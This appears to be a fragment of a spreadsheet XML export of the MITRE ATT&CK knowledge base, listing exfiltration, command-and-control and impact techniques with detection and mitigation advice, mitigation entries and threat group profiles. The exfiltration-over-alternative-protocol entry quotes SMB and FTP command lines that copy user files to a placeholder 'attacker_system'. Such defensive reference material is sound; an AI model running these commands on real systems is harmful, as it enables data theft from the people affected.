  <si>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Packet capture, Netflow/Enclave netflow, Malware reverse engineering, Process use of network</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1032</t>
  </si>
  <si>
    <t>T1095</t>
  </si>
  <si>
    <t>Standard Non-Application Layer Protocol</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</si>
  <si>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</si>
  <si>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Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems. Also ensure hosts are only provisioned to communicate over authorized interfaces.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</si>
  <si>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Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1095</t>
  </si>
  <si>
    <t>T1065</t>
  </si>
  <si>
    <t>Uncommonly Used Port</t>
  </si>
  <si>
    <t>Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.</t>
  </si>
  <si>
    <t>Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports.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</si>
  <si>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https://attack.mitre.org/techniques/T1065</t>
  </si>
  <si>
    <t>TA0010</t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>The adversary is trying to steal data.
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typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0010</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>Automated Exfiltration</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</si>
  <si>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</si>
  <si>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Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities, scripts, or potentially malicious software that may be used to transfer data outside of a network,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</si>
  <si>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https://attack.mitre.org/techniques/T1020</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to compress files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)
If network intrusion prevention or data loss prevention tools are set to block specific file types from leaving the network over unencrypted channels, then an adversary may move to an encrypted channel.</t>
  </si>
  <si>
    <t>Binary file metadata, File monitoring, Process command-line parameters, Process monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to encrypt files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1022</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1030</t>
  </si>
  <si>
    <t>T1048</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different channels could include Internet Web services such as cloud storage.
Adversaries may leverage various operating system utilities to exfiltrate data over an alternative protocol. 
SMB command-line example:
* &lt;code&gt;net use \\\attacker_system\IPC$ /user:username password &amp;&amp; xcopy /S /H /C /Y C:\Users\\* \\\attacker_system\share_folder\&lt;/code&gt;
Anonymous FTP command-line example:(Citation: Palo Alto OilRig Oct 2016)
* &lt;code&gt;echo PUT C:\Path\to\file.txt | ftp -A attacker_system&lt;/code&gt;
</t>
  </si>
  <si>
    <t>Follow best practices for network firewall configurations to allow only necessary ports and traffic to enter and exit the network. For example, if services like FTP are not required for sending information outside of a network, then block FTP-related ports at the network perimeter. Enforce proxies and use dedicated servers for services such as DNS and only allow those systems to communicate over respective ports/protocols, instead of all systems within a network. (Citation: TechNet Firewall Design) These actions will help reduce command and control and exfiltration path opportunities.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t>
  </si>
  <si>
    <t>User interface, Process monitoring, Process use of network, Packet capture</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>Exfiltration Over Command and Control Channel</t>
  </si>
  <si>
    <t>Data exfiltration is performed over the Command and Control channel. Data is encoded into the normal communications channel using the same protocol as command and control communications.</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</si>
  <si>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</si>
  <si>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Mitigations for command and control apply.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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1041</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Ensure host-based sensors maintain visibility into usage of all network adapters and prevent the creation of new ones where possible. (Citation: Microsoft GPO Bluetooth FEB 2009) (Citation: TechRepublic Wireless GPO FEB 2009)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1011</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Monitor file access on removable media. Detect processes that execute when removable media are mounted.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1052</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>Scheduled Transfer</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1029</t>
  </si>
  <si>
    <t>T1537</t>
  </si>
  <si>
    <t>Transfer Data to Cloud Account</t>
  </si>
  <si>
    <t xml:space="preserve">An adversary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</si>
  <si>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 xml:space="preserve">Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. </t>
  </si>
  <si>
    <t>Azure, AWS</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1537</t>
  </si>
  <si>
    <t>TA0040</t>
  </si>
  <si>
    <t>Impact</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/tactics/TA0040</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1531</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Wipe](https://attack.mitre.org/techniques/T1488) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1487)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2017)(Citation: Talos Olympic Destroyer 2018)</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</si>
  <si>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t>
  </si>
  <si>
    <t>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Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1485</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</si>
  <si>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</si>
  <si>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</si>
  <si>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[Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of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t>
  </si>
  <si>
    <t>Consider implementing IT disaster recovery plans that contain procedures for regularly taking and testing data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP)
In some cases, the means to decrypt files affected by a ransomware campaign is released to the public. Research trusted sources for public releases of decryptor tools/keys to reverse the effects of ransomware.
Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>Kernel drivers, File monitoring, Process command-line parameters, Process monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1486</t>
  </si>
  <si>
    <t>T1491</t>
  </si>
  <si>
    <t>Defacement</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. 
### Internal
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Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages. While internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)
### External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Defacement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</si>
  <si>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</si>
  <si>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Packet capture, Web application firewall logs, Web logs, Packet capture</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1491</t>
  </si>
  <si>
    <t>T1488</t>
  </si>
  <si>
    <t>Disk Content Wipe</t>
  </si>
  <si>
    <t>Adversaries may erase the contents of storage devices on specific systems as well as large numbers of systems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[Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1488</t>
  </si>
  <si>
    <t>T1487</t>
  </si>
  <si>
    <t>Disk Structure Wipe</t>
  </si>
  <si>
    <t>Adversaries may corrupt or wipe the disk data structures on hard drive necessary to boot systems; targeting specific critical systems as well as a large number of systems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Wipe](https://attack.mitre.org/techniques/T1487) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1488) if all sectors of a disk are wiped.
To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other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t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1487</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</si>
  <si>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</si>
  <si>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</si>
  <si>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the Network Denial of Service Technique [Network Denial of Service](https://attack.mitre.org/techniques/T1498).
### OS Exhaustion Flood
Since operating systems (OSs) are responsible for managing the finite resources on a system, they can be a target for DoS.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 SYN Flood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 ACK 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 Service Exhaustion Flood
Different network services provided by systems are targeted in different ways to conduct a DoS. Adversaries often target DNS and web servers, but other services have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
#### Simple HTTP Flood
A large number of HTTP requests can be issued to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)
#### SSL Renegotiation Attack
SSL Renegotiation Attacks take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 Application Exhaustion Flood
Web applications that sit on top of web server stacks can be targeted for DoS. Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018)
### Application or System Exploitation
Software vulnerabilities exist that when exploited can cause an application or system to crash and deny availability to users.(Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition.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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>SSL/TLS inspection, Web logs, Web application firewall logs, Network intrusion detection system</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499</t>
  </si>
  <si>
    <t>T1495</t>
  </si>
  <si>
    <t>Firmware Corruption</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</si>
  <si>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</si>
  <si>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System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.</t>
  </si>
  <si>
    <t xml:space="preserve">Prevent adversary access to privileged accounts or access necessary to perform this technique. Check the integrity of the existing BIOS and device firmware to determine if it is vulnerable to modification. Patch the BIOS and other firmware as necessary to prevent successful use of known vulnerabilities. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1495</t>
  </si>
  <si>
    <t>T1490</t>
  </si>
  <si>
    <t>Inhibit System Recovery</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Consider technical controls to prevent the disabling of services or deletion of files involved in system recovery.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Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>Windows Registry, Services, Windows event logs, Process command-line parameters</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1490</t>
  </si>
  <si>
    <t>T1498</t>
  </si>
  <si>
    <t>Network Denial of Service</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</si>
  <si>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</si>
  <si>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
Depending on flood volume, on-premises filtering may be possible by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.(Citation: CERT-EU DDoS March 2017)
As immediate response may require rapid engagement of 3rd parties, analyze the risk associated to critical resources being affected by Network DoS attacks and create a disaster recovery plan/business continuity plan to respond to incidents.(Citation: CERT-EU DDoS March 2017)</t>
  </si>
  <si>
    <t>Sensor health and status, Network protocol analysis, Netflow/Enclave netflow, Network intrusion detection system</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1498</t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>Resource Hijacking</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>Azure activity logs, Stackdriver logs, AWS CloudTrail logs, Process use of network</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1496</t>
  </si>
  <si>
    <t>T1494</t>
  </si>
  <si>
    <t>Runtime Data Manipulation</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</si>
  <si>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Association](https://attack.mitre.org/techniques/T1042)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</si>
  <si>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Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values.</t>
  </si>
  <si>
    <t>Identify critical business and system processes that may be targeted by adversaries and work to secure those systems against tampering. Prevent critical business and system processes from being replaced, overwritten, or reconfigured to load potentially malicious code. Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1494</t>
  </si>
  <si>
    <t>T1489</t>
  </si>
  <si>
    <t>Service Stop</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</si>
  <si>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</si>
  <si>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Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
Monitor Registry edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;.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</si>
  <si>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Ensure proper process, registry, and file permissions are in place to inhibit adversaries from disabling or interfering with critical services. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. Harden systems used to serve critical network, business, and communications functions. Operate intrusion detection, analysis, and response systems on a separate network from the production environment to lessen the chances that an adversary can see and interfere with critical response functions.</t>
  </si>
  <si>
    <t>Process command-line parameters, Process monitoring, Windows Registry, API monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1489</t>
  </si>
  <si>
    <t>T1492</t>
  </si>
  <si>
    <t>Stored Data Manipulation</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</si>
  <si>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</si>
  <si>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Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.</t>
  </si>
  <si>
    <t>Identify critical business and system processes that may be targeted by adversaries and work to secure the data related to those processes against tampering. Ensure least privilege principles are applied to important information resources to reduce exposure to data manipulation risk. Consider encrypting important information to reduce an adversaries ability to perform tailor data modifications. Where applicable, examine using file monitoring software to check integrity on important files and directories as well as take corrective actions when unauthorized changes are detected.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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1492</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Wipe](https://attack.mitre.org/techniques/T1487) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1529</t>
  </si>
  <si>
    <t>T1493</t>
  </si>
  <si>
    <t>Transmitted Data Manipulation</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Identify critical business and system processes that may be targeted by adversaries and work to secure communications related to those processes against tampering. Encrypt all important data flows to reduce the impact of tailored modifications on data in transit.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1493</t>
  </si>
  <si>
    <t>M1055</t>
  </si>
  <si>
    <t>Do Not Mitigate</t>
  </si>
  <si>
    <t>This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1055</t>
  </si>
  <si>
    <t>M1054</t>
  </si>
  <si>
    <t>Software Configuration</t>
  </si>
  <si>
    <t>Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1054</t>
  </si>
  <si>
    <t>M1053</t>
  </si>
  <si>
    <t>Data Backup</t>
  </si>
  <si>
    <t>Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1053</t>
  </si>
  <si>
    <t>M1052</t>
  </si>
  <si>
    <t>User Account Control</t>
  </si>
  <si>
    <t>Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1052</t>
  </si>
  <si>
    <t>M1051</t>
  </si>
  <si>
    <t>Update Software</t>
  </si>
  <si>
    <t>Perform regular software updates to mitigate exploitation risk.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1051</t>
  </si>
  <si>
    <t>M1050</t>
  </si>
  <si>
    <t>Exploit Protection</t>
  </si>
  <si>
    <t>Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1050</t>
  </si>
  <si>
    <t>M1049</t>
  </si>
  <si>
    <t>Antivirus/Antimalware</t>
  </si>
  <si>
    <t>Use signatures or heuristics to detect malicious software.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1049</t>
  </si>
  <si>
    <t>M1048</t>
  </si>
  <si>
    <t>Application Isolation and Sandboxing</t>
  </si>
  <si>
    <t>Restrict execution of code to a virtual environment on or in transit to an endpoint system.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1048</t>
  </si>
  <si>
    <t>M1047</t>
  </si>
  <si>
    <t>Audit</t>
  </si>
  <si>
    <t>Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1047</t>
  </si>
  <si>
    <t>M1046</t>
  </si>
  <si>
    <t>Boot Integrity</t>
  </si>
  <si>
    <t>Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1046</t>
  </si>
  <si>
    <t>M1045</t>
  </si>
  <si>
    <t>Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1045</t>
  </si>
  <si>
    <t>M1044</t>
  </si>
  <si>
    <t>Restrict Library Loading</t>
  </si>
  <si>
    <t>Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1044</t>
  </si>
  <si>
    <t>M1043</t>
  </si>
  <si>
    <t>Credential Access Protection</t>
  </si>
  <si>
    <t>Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1043</t>
  </si>
  <si>
    <t>M1042</t>
  </si>
  <si>
    <t>Disable or Remove Feature or Program</t>
  </si>
  <si>
    <t>Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1042</t>
  </si>
  <si>
    <t>M1041</t>
  </si>
  <si>
    <t>Encrypt Sensitive Information</t>
  </si>
  <si>
    <t>Protect sensitive information with strong encryption.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1041</t>
  </si>
  <si>
    <t>M1040</t>
  </si>
  <si>
    <t>Behavior Prevention on Endpoint</t>
  </si>
  <si>
    <t>Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1040</t>
  </si>
  <si>
    <t>M1039</t>
  </si>
  <si>
    <t>Environment Variable Permissions</t>
  </si>
  <si>
    <t>Prevent modification of environment variables by unauthorized users and groups.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1039</t>
  </si>
  <si>
    <t>M1038</t>
  </si>
  <si>
    <t>Execution Prevention</t>
  </si>
  <si>
    <t>Block execution of code on a system through application whitelisting, blacklisting, and/or script blocking.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1038</t>
  </si>
  <si>
    <t>M1037</t>
  </si>
  <si>
    <t>Filter Network Traffic</t>
  </si>
  <si>
    <t>Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1037</t>
  </si>
  <si>
    <t>M1036</t>
  </si>
  <si>
    <t>Account Use Policies</t>
  </si>
  <si>
    <t>Configure features related to account use like login attempt lockouts, specific login times, etc.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1036</t>
  </si>
  <si>
    <t>M1035</t>
  </si>
  <si>
    <t>Limit Access to Resource Over Network</t>
  </si>
  <si>
    <t>Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1035</t>
  </si>
  <si>
    <t>M1034</t>
  </si>
  <si>
    <t>Limit Hardware Installation</t>
  </si>
  <si>
    <t>Block users or groups from installing or using unapproved hardware on systems, including USB devices.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1034</t>
  </si>
  <si>
    <t>M1033</t>
  </si>
  <si>
    <t>Limit Software Installation</t>
  </si>
  <si>
    <t>Block users or groups from installing unapproved software.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1033</t>
  </si>
  <si>
    <t>M1032</t>
  </si>
  <si>
    <t>Multi-factor Authentication</t>
  </si>
  <si>
    <t>Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1032</t>
  </si>
  <si>
    <t>M1031</t>
  </si>
  <si>
    <t>Network Intrusion Prevention</t>
  </si>
  <si>
    <t>Use intrusion detection signatures to block traffic at network boundaries.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1031</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1030</t>
  </si>
  <si>
    <t>M1029</t>
  </si>
  <si>
    <t>Remote Data Storage</t>
  </si>
  <si>
    <t>Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1029</t>
  </si>
  <si>
    <t>M1028</t>
  </si>
  <si>
    <t>Operating System Configuration</t>
  </si>
  <si>
    <t>Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1028</t>
  </si>
  <si>
    <t>M1027</t>
  </si>
  <si>
    <t>Password Policies</t>
  </si>
  <si>
    <t>Set and enforce secure password policies for accounts.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1027</t>
  </si>
  <si>
    <t>M1026</t>
  </si>
  <si>
    <t>Privileged Account Management</t>
  </si>
  <si>
    <t>Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1026</t>
  </si>
  <si>
    <t>M1025</t>
  </si>
  <si>
    <t>Privileged Process Integrity</t>
  </si>
  <si>
    <t>Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1025</t>
  </si>
  <si>
    <t>M1024</t>
  </si>
  <si>
    <t>Restrict Registry Permissions</t>
  </si>
  <si>
    <t>Restrict the ability to modify certain hives or keys in the Windows Registry.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1024</t>
  </si>
  <si>
    <t>M1022</t>
  </si>
  <si>
    <t>Restrict File and Directory Permissions</t>
  </si>
  <si>
    <t>Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1022</t>
  </si>
  <si>
    <t>M1021</t>
  </si>
  <si>
    <t>Restrict Web-Based Content</t>
  </si>
  <si>
    <t>Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1021</t>
  </si>
  <si>
    <t>M1020</t>
  </si>
  <si>
    <t>SSL/TLS Inspection</t>
  </si>
  <si>
    <t>Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1020</t>
  </si>
  <si>
    <t>M1019</t>
  </si>
  <si>
    <t>Threat Intelligence Program</t>
  </si>
  <si>
    <t>A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1019</t>
  </si>
  <si>
    <t>M1018</t>
  </si>
  <si>
    <t>User Account Management</t>
  </si>
  <si>
    <t>Manage the creation, modification, use, and permissions associated to user accounts.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1018</t>
  </si>
  <si>
    <t>M1017</t>
  </si>
  <si>
    <t>User Training</t>
  </si>
  <si>
    <t>Train users to to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1017</t>
  </si>
  <si>
    <t>M1016</t>
  </si>
  <si>
    <t>Vulnerability Scanning</t>
  </si>
  <si>
    <t>Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1016</t>
  </si>
  <si>
    <t>M1015</t>
  </si>
  <si>
    <t>Active Directory Configuration</t>
  </si>
  <si>
    <t>Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1015</t>
  </si>
  <si>
    <t>M1013</t>
  </si>
  <si>
    <t>Application Developer Guidance</t>
  </si>
  <si>
    <t>This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/mitigations/M1013</t>
  </si>
  <si>
    <t>G0001</t>
  </si>
  <si>
    <t>Group</t>
  </si>
  <si>
    <t>Axiom</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) is a cyber espionage group suspected to be associated with the Chinese government. It is responsible for the Operation SMN campaign. (Citation: Novetta-Axiom) Though both this group and [Winnti Group](https://attack.mitre.org/groups/G0044) use the malware [Winnti](https://attack.mitre.org/software/S0141), the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0001</t>
  </si>
  <si>
    <t>G0002</t>
  </si>
  <si>
    <t>Moafee</t>
  </si>
  <si>
    <t>[Moafee](https://attack.mitre.org/groups/G0002) is a threat group that appears to operate from the Guandong Province of China. Due to overlapping TTPs, including similar custom tools, Moafee is thought to have a direct or indirect relationship with the threat group [DragonOK](https://attack.mitre.org/groups/G0017). (Citation: Haq 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0002</t>
  </si>
  <si>
    <t>G0003</t>
  </si>
  <si>
    <t>Cleaver</t>
  </si>
  <si>
    <t>[Cleaver](https://attack.mitre.org/groups/G0003) is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. (Citation: Cylance Cleaver) Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). (Citation: Dell Threat Group 2889)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0003</t>
  </si>
  <si>
    <t>G0004</t>
  </si>
  <si>
